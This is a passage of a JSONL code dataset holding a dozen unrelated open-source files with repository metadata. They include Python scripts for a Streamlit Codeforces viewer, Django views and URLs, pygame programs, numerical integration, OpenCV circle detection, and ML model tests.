od6():\r\n print(\"ok\")\r\n\r\n\r\ndef otazka():\r\n global s\r\n print(\"1.Pridat jmeno\")\r\n print(\"2.odebrat jmeno\")\r\n print(\"3.vypsat seznam\")\r\n print(\"4.kolik je jmen v seznamu\")\r\n print(\"5.seznam jsem podle abecedy\")\r\n print(\"6.konec programu\")\r\n o = int(input(\"vyber\"))\r\n if o == 1:\r\n od1()\r\n if o == 2:\r\n od2()\r\n if o == 3:\r\n od3()\r\n if o == 4:\r\n od4()\r\n if o == 5:\r\n od5()\r\n elif o == 6:\r\n od6()\r\n\r\n\r\notazka()\r\n","repo_name":"EducaNet-school/zelvi-grafika-PetrPujman","sub_path":"seznamy/seznamy 6.py","file_name":"seznamy 6.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42407309987","text":"import altair as alt\nimport datetime\nimport streamlit as st\nimport json\nimport requests\nimport pandas as pd\nimport pycountry as pc\n\n\ndef find_best_matches(strs, s):\n results = []\n for x in strs:\n if s.lower() in x.lower():\n results.append(x)\n if len(results) == 7:\n return results\n return results\n\n\ndef main():\n\n data = []\n handle_tuples = []\n handles = []\n default_index = 0\n with open('codeforces_crawler\\codeforces_crawler\\spiders\\items_codeforces_spider_4.jl') as file:\n for i, line in enumerate(file):\n json_obj = json.loads(line)\n data.append(json_obj)\n handle_tuples.append((json_obj['handle'], i))\n if json_obj['handle'] in 'y0urs3lf':\n default_index = i\n handles = [t[0] for t in handle_tuples]\n\n st.write(\"# Codeforces User's Profile\")\n\n query = st.text_input(\n \"label\", placeholder=\"Enter a handle you want to find. For example: y0urs3lf\", label_visibility='hidden')\n\n selected_handle = \"\"\n\n # and ((not 'check' in st.session_state) or st.session_state['check'] == False):\n button_frames = []\n if query != \"\":\n # Call the search function and display the results\n results = find_best_matches(handles, query)\n if len(results) == 0:\n st.write(\"No results found\")\n else:\n st.write(f'Best results for **{query}**:')\n # (not 'check' in st.session_state) or st.session_state['check'] == False:\n if True:\n for result in results:\n # Display the result as a clickable link\n button_frame = st.empty()\n isClicked = button_frame.button(\n result, use_container_width=True, key=result)\n button_frames.append((button_frame, result))\n if isClicked:\n # Change the context of the page based on the selected result\n # result_frame.empty()\n selected_handle = result\n # st.session_state['check'] = True\n break\n\n if selected_handle != \"\":\n for (frame, handle) in button_frames:\n if handle != selected_handle:\n frame.empty()\n\n index = handles.index(selected_handle)\n\n user_info = data[index]\n rank = user_info['rank'][0:len(user_info['rank'])-1]\n color = get_color(rank)\n cur_handle = user_info[\"handle\"]\n\n st.markdown(\n f'

    {rank.title()}

    {cur_handle}

    ', unsafe_allow_html=True)\n\n # flag image and country\n country = user_info[\"country\"]\n if country != \"\":\n country_code = get_country_code(country).lower()\n image_url = f'https://codeforces.org/s/33207/images/flags-16/{country_code}.png'\n st.markdown(\n f'

    {country}

    ',\n unsafe_allow_html=True\n )\n else:\n st.markdown(\n f'

    {country}

    ',\n unsafe_allow_html=True\n )\n\n # rating\n st.markdown(\n f'

    Rating: {str(user_info[\"rating\"])}

    ',\n unsafe_allow_html=True\n )\n\n # max rating\n max_rating_color = get_color(user_info[\"max_rank\"])\n st.markdown(\n f'

    Max Rating: {str(user_info[\"max_rating\"])}, {user_info[\"max_rank\"].title()}', unsafe_allow_html=True\n )\n\n # request data to render the chart\n # return\n url = f\"https://codeforces.com/api/user.rating?handle={selected_handle}\"\n response = requests.get(url).json()\n\n if response[\"status\"] == \"OK\":\n data = response[\"result\"]\n\n contestName, rating, time, rank = [], [], [], []\n for x in data:\n contestName.append(x.get(\"contestName\"))\n rating.append(x.get(\"newRating\"))\n\n # convert time from unix-format -> date\n timestamp = x.get(\"ratingUpdateTimeSeconds\")\n dt_object = datetime.datetime.fromtimestamp(timestamp)\n formatted_date = dt_object.strftime('%Y-%m-%d')\n time.append(formatted_date)\n\n rank.append(x.get(\"rank\"))\n\n chart_data = pd.DataFrame(\n {\n 'contestName': contestName,\n 'rating': rating,\n 'time': time,\n 'rank': rank,\n })\n\n # altair support rendering chart with limit value in the axis\n y_min = max(0, min(chart_data[\"rating\"]) - 100)\n y_max = max(chart_data[\"rating\"]) + 100\n\n scale = alt.Scale(domain=(y_min, y_max))\n\n chart = alt.Chart(chart_data).mark_line(\n point=alt.OverlayMarkDef(\n size=50, filled=False, color=\"#4A55A2\", fill=\"#A0BFE0\"), # properties of the point\n color=\"#A0BFE0\" # color of the line\n ).encode(\n x='time:T', # the :T is added to display x-axis as Time, not String => more interactive\n # the alt.y is added to show the points in certain range\n y=alt.Y('rating', scale=scale),\n tooltip=['contestName', 'rank'],\n ).interactive()\n\n # Render the chart using Streamlit\n st.altair_chart(chart, use_container_width=True)\n else:\n st.write(\"**Error:**\", response[\"comment\"])\n else:\n pass\n\n\ndef get_color(rank):\n if rank == \"legendary grandmaster\":\n return \"black\"\n if rank == \"international grandmaster\":\n return \"red\"\n if rank == \"grandmaster\":\n return \"red\"\n if rank == \"international master\":\n return \"orange\"\n if rank == \"master\":\n return \"orange\"\n if rank == \"candidate master\":\n return \"purple\"\n if rank == \"expert\":\n return \"blue\"\n if rank == \"specialist\":\n return \"cyan\"\n if rank == \"pupil\":\n return \"green\"\n return \"grey\"\n\n\ndef get_country_code(country_name):\n if country_name == \"Vietnam\":\n return \"Vn\"\n if country_name == \"Taiwan\":\n return \"Tw\"\n try:\n country = pc.countries.get(name=country_name)\n return country.alpha_2\n except AttributeError:\n return \"\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnnam03/codeforces-tools","sub_path":"no_api_cf_user_info.py","file_name":"no_api_cf_user_info.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8095913568","text":"import pygame\nfrom player import Player\n\n# Initialize pygame\npygame.init()\n\n# Create the screen (width, height)\nscreen = pygame.display.set_mode((800, 640))\nprint(\"Hello\")\n\n# Title and Icon\n# Caption is the title of the window\npygame.display.set_caption(\"Jeraldyn\")\n# Icon is the image on the top left of the window\n#icon = pygame.image.load('ufo.png')\n# Set the icon\n#pygame.display.set_icon(icon)\n\n# Player Images\nplayerImg = pygame.image.load('Images/Main-Character/character-0.png')\n\n# Create Instance of player\nplayer = Player()\n\n# Game loop\nrunning = True\n\n# While the game is running\nwhile running:\n\n # Event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n screen.fill((91,153,139))\n\n #Update the player\n player.update(event)\n \n # Draw the player\n screen.blit(playerImg, (player.playerX, player.playerY))\n\n # Update the screen\n pygame.display.update()","repo_name":"jalenm872/Pygame-Game-One","sub_path":"first-game.py","file_name":"first-game.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73638295139","text":"from django.db.models import Prefetch, Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\n\nfrom apps.sneaker.models import Sneaker, SneakerSize, Brand\n\nSORT_RULE_MAP = {\n 1: '-click_num',\n 2: '-created_at',\n 3: '-discount_price',\n 4: 'discount_price',\n}\n\n\ndef get_sneakers_sort(sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n return Sneaker.objects.prefetch_related('sneaker_image').filter(is_active=True).order_by(sort_key)\n\n\ndef get_sneakers_with_brand_sort(brand_id, sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n brand = get_object_or_404(Brand, id=brand_id)\n sneakers = Sneaker.objects.filter(\n Q(brand_id=brand_id) & Q(is_active=True)\n ).order_by(sort_key)\n return brand, sneakers\n\n\ndef sneaker_sort_return(request, brand_id, sort_rule):\n if brand_id == 0:\n sneakers = get_sneakers_sort(sort_rule)\n return render(request, 'index.html', {'sneakers': sneakers})\n else:\n brand, sneakers = get_sneakers_with_brand_sort(brand_id, sort_rule)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef sneaker_all(request):\n sneakers = get_sneakers_sort(1)\n return render(request, 'index.html', {'sneakers': sneakers})\n\n\ndef get_recommendation(sneaker_id):\n sneaker = get_object_or_404(Sneaker, id=sneaker_id)\n brand_id = sneaker.brand.id\n brand_sneakers = Sneaker.objects.filter(Q(brand_id=brand_id) & (~Q(id=sneaker_id))).order_by('-click_num')\n return brand_sneakers\n\n\ndef sneaker_detail(request, pk):\n sneaker = get_object_or_404(\n Sneaker.objects.prefetch_related(\n Prefetch('sneaker_size', queryset=SneakerSize.objects.order_by('size'))),\n pk=pk, is_active=True\n )\n\n click_num = sneaker.click_num\n sneaker.click_num = click_num + 1\n sneaker.save()\n\n other_sneakers = get_recommendation(sneaker.id)\n return render(request, 'sneaker/detail.html', {'sneaker': sneaker, 'other_sneakers': other_sneakers})\n\n\ndef brand_detail(request, pk=None):\n brand, sneakers = get_sneakers_with_brand_sort(pk, 1)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef search(request):\n keywords = request.GET.get('keywords')\n sneakers = Sneaker.objects.none()\n if len(keywords) != 0:\n keyword_list = keywords.split()\n for keyword in keyword_list:\n res = Sneaker.objects.filter(Q(brand__name__icontains=keyword) | Q(title__icontains=keyword))\n if len(res) != 0:\n if len(sneakers) == 0:\n sneakers = res\n else:\n sneakers = sneakers & res\n return render(request, 'sneaker/search_result.html', {'sneakers': sneakers})\n","repo_name":"YuboGuo1024/sneaker_mall","sub_path":"apps/sneaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7876199752","text":"import os\nimport pytest\nfrom opgee.error import CommandlineError\nfrom opgee.config import IsWindows\nDEVNULL = 'nul' if IsWindows else '/dev/null'\n\nis_sherlock = os.environ.get('LMOD_SYSHOST') == 'sherlock'\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\n@pytest.mark.parametrize(\n \"args\", [\n ['graph', '--classes', 'core', '--classes-output', DEVNULL],\n ['graph', '--field', 'gas_lifting_field', '--field-output', DEVNULL],\n ['graph', '--hierarchy-output', DEVNULL],\n ]\n)\ndef test_graphing(opgee_main, args):\n try:\n opgee_main.run(None, args)\n good = True\n except Exception as e:\n # print(e)\n good = False\n\n assert good\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\ndef test_unknown_field(opgee_main):\n with pytest.raises(CommandlineError, match=r\"Field name .* was not found in model\"):\n opgee_main.run(None, ['graph', '--field', 'unknown-field'])\n","repo_name":"Stanford-EAO/OPGEEv4","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"72186346661","text":"from django.conf import settings\nfrom django.views import defaults as default_views\nfrom django.urls import path, re_path\nfrom django.conf.urls.static import static\nfrom adminfeautures.views import (\n user_list_view,\n update_solar_module_preise_view,\n update_wallbox_preise_view,\n update_optional_accessories_preise_view,\n update_andere_konfiguration_werte_view,\n avatar_upload_form,\n delete_user,\n test_delete_selected,\n PasswordUpdateView,\n ViewAdminOrders,\n UpdateAdminAngebot,\n DeleteAngebot,\n UserUpdateView,\n TopVerkauferContainerUpdateView,\n DeleteSelectedAngebots,\n)\n\napp_name = \"adminfeautures\"\n\nurlpatterns = [\n path(\"user-list/\", user_list_view, name=\"user_list\"),\n path(\"user//edit/\", UserUpdateView.as_view(), name=\"user-edit\"),\n path(\n \"user//top-verkaufer-container-update/\",\n TopVerkauferContainerUpdateView.as_view(),\n name=\"top-verkaufer-container-update\",\n ),\n path(\"user//orders/\", ViewAdminOrders.as_view(), name=\"user-orders\"),\n path(\"user//user-update/\", UserUpdateView.as_view(), name=\"user-update\"),\n path(\n \"user//change_password/\",\n PasswordUpdateView.as_view(),\n name=\"change_password\",\n ),\n path(\"user//delete/\", delete_user, name=\"delete_user\"),\n path(\n \"user//orders/\",\n ViewAdminOrders.as_view(),\n name=\"view_admin_orders\",\n ),\n path(\n \"user//orders//\",\n UpdateAdminAngebot.as_view(),\n name=\"update_admin_angebot\",\n ),\n path(\n \"user//orders/delete//\",\n DeleteAngebot.as_view(),\n name=\"delete_angebot\",\n ),\n path(\n \"user//orders/test-delete-selected/\",\n test_delete_selected,\n name=\"test_delete_selected\",\n ),\n path(\n \"user//orders/delete-selected/\",\n DeleteSelectedAngebots.as_view(),\n name=\"delete_selected_angebots\",\n ),\n path(\"user//upload-avatar/\", avatar_upload_form, name=\"upload_avatar\"),\n path(\n \"prices/update_solar_module_preise//\",\n update_solar_module_preise_view,\n name=\"update_solar_module_preise\",\n ),\n path(\n \"prices/update_wallbox_preise//\",\n update_wallbox_preise_view,\n name=\"update_wallbox_preise\",\n ),\n path(\n \"prices/update_optional_accessories_preise//\",\n update_optional_accessories_preise_view,\n name=\"update_optional_accessories_preise\",\n ),\n path(\n \"prices/update_andere_konfiguration_werte//\",\n update_andere_konfiguration_werte_view,\n name=\"update_andere_konfiguration_werte\",\n ),\n re_path(\n r\"^400/$\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n re_path(\n r\"^403/$\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n re_path(\n r\"^404/$\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n re_path(r\"^500/$\", default_views.server_error),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"teamitjuno/jsh-ubuntu-droplet","sub_path":"adminfeautures/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74666496740","text":"# Replace every array element by multiplication of previous and next\n# Given an array of integers, update every element with multiplication of previous and next elements with following exceptions.\n# a) First element is replaced by multiplication of first and second.\n# b) Last element is replaced by multiplication of last and second last.\n\ndef MultiplicationPreviousNext(ary):\n\n fnl_lst=[]\n\n for i in range(0,len(ary)):\n if i==0:\n fnl_lst.append(ary[i]*ary[i+1])\n elif i==len(ary)-1:\n fnl_lst.append(ary[i-1]*ary[i])\n else:\n fnl_lst.append(ary[i-1]*ary[i+1])\n\n return fnl_lst\n\ndef main():\n \n ary=[2, 3, 4, 5, 6]\n print(MultiplicationPreviousNext(ary))\n\nif __name__=='__main__':\n main()","repo_name":"ksayee/programming_assignments","sub_path":"python/CodingExercises/MultiplicationPreviousNext.py","file_name":"MultiplicationPreviousNext.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41106654727","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 12:52:01 2020\nCircle Detection inspiration:\nhttps://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n@author: modal\n\"\"\"\n#%% INIT\nimage_file_name = 'a2_a_cropped.jpg'\n\nfrom well_plate_project.config import data_dir\nraw_data_dir = data_dir / 'raw'\npath = raw_data_dir / 'EXPERIMENTS'\nimage_file = raw_data_dir / image_file_name\nassert image_file.is_file()\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Load in image, convert to gray scale, and Otsu's threshold\nimage = cv2.imread(str(image_file))\nplt.imshow(image)\nplt.show()\n\noutput = image.copy()\nheight, width = image.shape[:2]\nmaxRadius = int(1.05*(width/14)/2) #12+2\nminRadius = int(0.79*(width/14)/2) #12+2\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncircles = cv2.HoughCircles(image=gray, \n method=cv2.HOUGH_GRADIENT, \n dp=1.2, \n minDist=2*minRadius, #there is no overlapping, you could say that the distance between two circles is at least the diameter, so minDist could be set to something like 2*minRadius.\n param1=50,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius \n )\n\nif circles is not None:\n # convert the (x, y) coordinates and radius of the circles to integers\n circlesRound = np.round(circles[0, :]).astype(\"int\")\n # loop over the (x, y) coordinates and radius of the circles\n for (x, y, r) in circlesRound:\n cv2.circle(output, (x, y), r, (0, 255, 0), 4)\n\n plt.imshow(output)\nelse:\n print ('No circles found')\n\n\n\n#https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n\n","repo_name":"MthBr/well-plate-light-driven-predictions","sub_path":"well_plate_project/data_etl/backup_test/circle_detection_test2.py","file_name":"circle_detection_test2.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20232276158","text":"# 5 лаба\nimport numpy as np\nimport matplotlib.pyplot as canvas\nfrom numpy import log as ln\n\n\ndef f(x):\n return (x ** 2) * ln(x)\n\n\ndef f2(x):\n return 2 * ln(x) + 3\n\n\ndef trapecy(x, h, a, b):\n size = len(x)\n res = (f(a) + f(b)) / 2\n for i in range(1, size):\n res += f(x[i])\n return res * h\n\n\ndef simpson(x, h, a, b):\n size = int(len(x) / 2)\n res = (f(a) + 4 * f(a + h) + f(b))\n for i in range(1, size):\n res += 2 * f(x[2 * i]) + 4 * f(x[2 * i + 1])\n return res * h / 3\n\n\na = 1\nb = 2\nd = np.arange(a, b, 0.001)\ncanvas.figure(1)\ncanvas.title(\"2я производная\")\ncanvas.xlabel(\"Х\")\ncanvas.ylabel(\"Y\")\ncanvas.grid()\ncanvas.plot(d, f2(d))\nx_m = 2.0 # максимум 2й производной. Получен графическим методом\nm = f2(x_m) # максимальное значение 2й производной\n# eps = 0.00001\n# h = numpy.sqrt(eps*12/((b-a)*m)) # h = 0.005230482293837083\n# n = (b-a)/h #n = 192 (на самом деле 191.186958...., но берем 192 т.к. кратно 4) 192/4 = 48\nh = (b - a) / 192\nxh = np.arange(a, b, h)\nx2h = np.arange(a, b, 2 * h)\ntrapecy1 = trapecy(xh, h, a, b)\ntrapecy2 = trapecy(x2h, 2 * h, a, b)\nsimpson1 = simpson(xh, h, a, b)\nsimpson2 = simpson(x2h, 2 * h, a, b)\nexact = 1.070614703715409714001507879444 # точный результат\nprint(\"Метод трапеций:\")\nprint(\"\\tРезультат с шагом h ► \" + str(trapecy1) + \"\\n\\t\\tс шагом 2h ► \" + str(trapecy2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - trapecy1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(trapecy2 - trapecy1) / 3))\nprint(\"Метода Симпсона:\")\nprint(\"\\tРезультат с шагом h ► \" + str(simpson1) + \"\\n\\t\\tс шагом 2h ► \" + str(simpson2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - simpson1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(simpson2 - simpson1) / 15))\ncanvas.show()\n","repo_name":"MalyshkinMike/Gubar","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23132176977","text":"import os\nimport pygame\nimport time\nimport random\n\nlast_point = [320, 0]\nlast_point1 = [320, 0]\n\n\ndef setup(screen, etc):\n pass\n\ndef draw(screen, etc):\n \n global last_point, last_point1, speed\n \n linewidth = int(etc.knob1*10)+1\n #lines = int(etc.knob2*89)+10\n #lines2\n lines = 72#int(65-(etc.knob2*65))+7\n spacehoriz = 180*etc.knob2+18\n spacevert = spacehoriz\n recsize = 10*etc.knob3\n #if recsize <1 : recsize = 0\n \n \n \n \n for m in range(0, lines) :\n \n #space = int(1280/lines)\n x = m*spacehoriz\n y = 0\n auDio = etc.audio_in[m] / 35\n color = etc.color_picker()\n if auDio < 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y + auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0)\n \n for i in range(0, lines) :\n \n #space = int(1280/lines)\n x = i*spacehoriz\n y = 720\n auDio = etc.audio_in[i] / 35\n color = etc.color_picker()\n if auDio > 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y - -auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0) \n \n for j in range(0, lines) :\n \n space = j*spacehoriz\n \n pygame.draw.line(screen, color, (0,space), (1280,space), linewidth)\n \n \n \n \n ","repo_name":"critterandguitari/ETC_Modes","sub_path":"S - Mirror Grid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"} +{"seq_id":"16447370923","text":"import pandas as pd\nimport pytest\nimport os\nimport numpy as np\nimport pickle\nfrom model.ml.data import process_data\nfrom model.ml.model import compute_model_metrics, inference\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\nTEST_DATA_PATH = \"data/raw-census.csv\"\nMODEL_PATH = \"model/saved_models/saved_model.pkl\"\nENCODER_PATH = \"model/saved_models/saved_encoder.pkl\"\nLB_PATH = \"model/saved_models/saved_lb.pkl\"\n\n\n@pytest.fixture\ndef data():\n \"\"\"Load some test data.\"\"\"\n\n if os.path.isfile(TEST_DATA_PATH):\n logger.info(f\"Loading data file {TEST_DATA_PATH}\")\n data = pd.read_csv(TEST_DATA_PATH, nrows=200)\n else:\n logger.info(f\"Data file {TEST_DATA_PATH} not found\")\n exit()\n\n return data\n\n\n@pytest.fixture\ndef cat_features():\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n return cat_features\n\n\n@pytest.fixture\ndef model():\n return pickle.load(open(MODEL_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef encoder():\n return pickle.load(open(ENCODER_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef lb():\n return pickle.load(open(LB_PATH, \"rb\"))\n\n\ndef test_process_data(data, cat_features):\n\n X_train, y_train, encoder, lb = process_data(\n data, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n assert (\n X_train.shape[0] == data.shape[0]\n ), \"Wrong number of rows in source data\"\n\n assert (\n X_train.shape[1] > data.shape[1]\n ), \"Wrong number of features in processed data\"\n\n assert (\n y_train.shape[0] == data.shape[0]\n ), \"Wrong shape of y_train rows after processing data\"\n\n\ndef test_compute_model_metrics():\n\n y = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])\n preds = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])\n precision, recall, fbeta = compute_model_metrics(y, preds)\n\n assert precision > 0.9\n assert recall > 0.6\n assert fbeta > 0.6\n\n\ndef test_inference(model, encoder, lb, data, cat_features):\n \"\"\"Test model inference\"\"\"\n\n X_test, y_test, encoder, lb = process_data(\n data,\n categorical_features=cat_features,\n encoder=encoder,\n lb=lb,\n label=\"salary\",\n training=False,\n )\n\n y_pred = inference(model, X_test)\n\n assert y_pred.shape[0] == X_test.shape[0], \"Wrong predictions shape\"\n pred_average = np.average(y_pred)\n assert (\n 1 >= pred_average >= 0\n ), \"Prediction average of {pred_average} is not between 0 and 1\"\n\n\n# if __name__ == \"__main__\":\n\n# test_inference(model(), encoder(), lb(), data(), cat_features())\n# test_compute_model_metrics()\n# test_process_data(data(), cat_features())\n","repo_name":"ainfinum/mlops-project3","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11278248011","text":"from __future__ import division\nimport pygame, sys\nfrom pygame.locals import *\npygame.init()\n\n\"\"\" ericbic.py\nby Eric J.Parfitt (ejparfitt@gmail.com)\n\nThis program is designed for coding and decoding the roman alphabet\ninto and out of a character set I made up. My characters are all made\nup of either one or two of a set of four different character parts which\ncan be combined in different ways to get a total of 30 new characters.\n\nVersion: 1.0 alpha\n\"\"\"\n\nWIDTH = 500\nHEIGHT = 400\n\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nclass Icon:\n def __init__(self, image, position=(0, 0)):\n self.image = image\n self.rect = image.get_rect()\n self.rect.x = position[0]\n self.rect.y = position[1]\n\nclass Canvas:\n def __init__(self):\n self.isTop = self.isBottom = self.isFlipped = self.isReset = False\n self.text = None\n self.bottomHalf = None\n self.topHalf = None\n \n def getIcon(self, pallet, mouseLoc):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image)\n return newIcon, i\n return None, None\n \n def tryAdd(self, pallet, mouseLoc, position):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image, position)\n windowSurface.blit(newIcon.image, newIcon.rect)\n return i\n\n def moveBottomHalf(self, bottomHalf, topHalf):\n self.bottomHalf.rect.topleft = self.topHalf.rect.bottomright\n self.bottomHalf.rect.move_ip(0, -int(round(CURVE_WIDTH)))\n \n def update(self, isClick, letter):\n mouseLoc = pygame.mouse.get_pos()\n if letter is not None:\n if self.isFlipped:\n for icon in pallet:\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = False\n letter = letter.capitalize()\n row, col = next(((i, row.index(letter)) for i, row in\n enumerate(alphabet) if letter in row), (None, None))\n if row is not None:\n self.isReset = True\n oldTopHalf = self.topHalf\n oldBottomHalf = self.bottomHalf\n self.topHalf = Icon(pallet[row].image, TOP_CO)\n if col != 0:\n self.bottomHalf = Icon(pallet[col - 1].image)\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n else:\n self.bottomHalf = None\n if self.topHalf is not None:\n for icon in [oldTopHalf, oldBottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n if self.bottomHalf is not None:\n self.bottomHalf.image = pygame.transform.flip(\n self.bottomHalf.image, False, True)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK), (300, 300))\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip() \n letter = None\n elif isClick:\n newIcon, index = (self.getIcon(pallet, mouseLoc))\n if newIcon is not None:\n if self.isReset:\n for icon in [self.topHalf, self.bottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n self.isTop = self.isBottom = self.isReset = False\n if not (self.isTop and self.isBottom):\n if not self.isTop:\n self.isTop = True\n self.topHalf = newIcon\n self.topIndex = index\n self.topHalf.rect.topleft = TOP_CO\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n letter = alphabet[self.topIndex][0]\n else:\n self.isBottom = True\n self.bottomHalf = newIcon\n bottomIndex = index\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n letter = alphabet[self.topIndex][bottomIndex + 1]\n self.isReset = True\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK),\n (300, 300))\n for icon in pallet:\n #if icon is not None:\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = not self.isFlipped\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip()\n letter = None\n clock.tick(FPS)\n return letter\n\nwindowSurface.fill(WHITE)\nimageFiles = [\"EribicBump.png\", \"EribicSpike.png\", \"EribicLoop.png\",\n \"EribicLeftWave.png\", \"EribicRightWave.png\"]\npallet = [Icon(pygame.image.load(image)) for image in imageFiles]\nnoneSymbol = \"?\"\nalphabet = [[\"N\", \"U\", \"M\", \"R\", \"F\", noneSymbol],\n [\"I\", \"C\", \"T\", \"J\", \"V\", \"G\"], [\"E\", \"L\", \"H\", \"O\", \"K\", \"B\"],\n [\"A\", \"D\", \"Y\", \"Q\", noneSymbol, \"W\"],\n [\"S\", noneSymbol, \"P\", \"Z\", \"X\", noneSymbol]]\nletter = None\nfont = pygame.font.SysFont(\"comicsansms\", 72)\nICON_HEIGHT = 50\nORIGINAL_ICON_HEIGHT = 75.328\nORIGINAL_CURVE_WIDTH = 2.5\nCURVE_WIDTH = (ICON_HEIGHT / ORIGINAL_ICON_HEIGHT) * ORIGINAL_CURVE_WIDTH\nTOP_CO = (50, 200)\nwidthTotal = 0\nfor icon in pallet:\n width = icon.image.get_width() * ICON_HEIGHT / icon.image.get_height()\n icon.image = pygame.transform.smoothscale(icon.image, \n (int(round(width)), ICON_HEIGHT))\n icon.rect = icon.image.get_rect()\n widthTotal += width\nxLoc = 0\nfor i in range(len(pallet)):\n icon = pallet[i]\n icon.rect.x = xLoc\n windowSurface.blit(icon.image, icon.rect)\n xLoc += icon.image.get_width() + (WIDTH - widthTotal) / (len(pallet) - 1)\nisFlipped = 